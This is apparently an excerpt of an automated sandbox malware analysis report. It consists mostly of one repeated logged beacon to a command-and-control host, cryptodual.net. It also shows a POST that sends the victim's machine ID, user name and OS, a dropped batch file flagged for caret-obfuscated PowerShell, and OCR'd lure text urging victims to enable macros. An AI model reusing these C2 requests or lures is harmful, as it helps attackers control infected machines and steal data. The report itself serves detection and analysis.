Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Source: global traffic	HTTP traffic detected: GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1User-Agent: MyAgentHost: cryptodual.netCache-Control: no-cacheCookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161

Source: unknown

DNS traffic detected: queries for: cutt.ly

Source: unknown

HTTP traffic detected: POST /cc/gate.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: http genericHost: cryptodual.netContent-Length: 87Cache-Control: no-cacheData Raw: 48 57 49 44 3d 7b 38 34 36 65 65 33 34 30 2d 37 30 33 39 2d 31 31 64 65 2d 39 64 32 30 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 26 6e 61 6d 65 3d 41 6c 62 75 73 2f 30 36 31 35 34 34 26 6f 73 3d 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c Data Ascii: HWID={846ee340-7039-11de-9d20-806e6f6e6963}&name=user/061544&os=Windows 7 Professional

Source: powershell.exe, 00000007.00000002.2119050234.00000000022F0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2137769628.00000000022B0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2115698052.0000000002270000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000007.00000002.2119050234.00000000022F0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2137769628.00000000022B0000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2115698052.0000000002270000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 0000000E.00000002.2115049708.000000000036E000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.c
Source: powershell.exe, 00000007.00000002.2117026131.000000000020A000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanenTZ
Source: powershell.exe, 0000000A.00000002.2135991543.0000000000365000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000007.00000002.2116902605.00000000001DE000.00000004.00000020.sdmp, powershell.exe, 0000000A.00000002.2135991543.0000000000365000.00000004.00000020.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: dump.pcap, type: PCAP	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: 00000011.00000002.2129412226.000000000380B000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth
Source: C:\Users\user\Documents\pd.bat, type: DROPPED	Matched rule: Detects powershell keyword obfuscated with carets Author: Florian Roth

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Show sources

Source: Document image extraction number: 0	Screenshot OCR: Enable Editing from the yellow bar above 3. Once you have enabled editing, please click Enable Co
Source: Document image extraction number: 0	Screenshot OCR: Enable Content from the yellow bar above
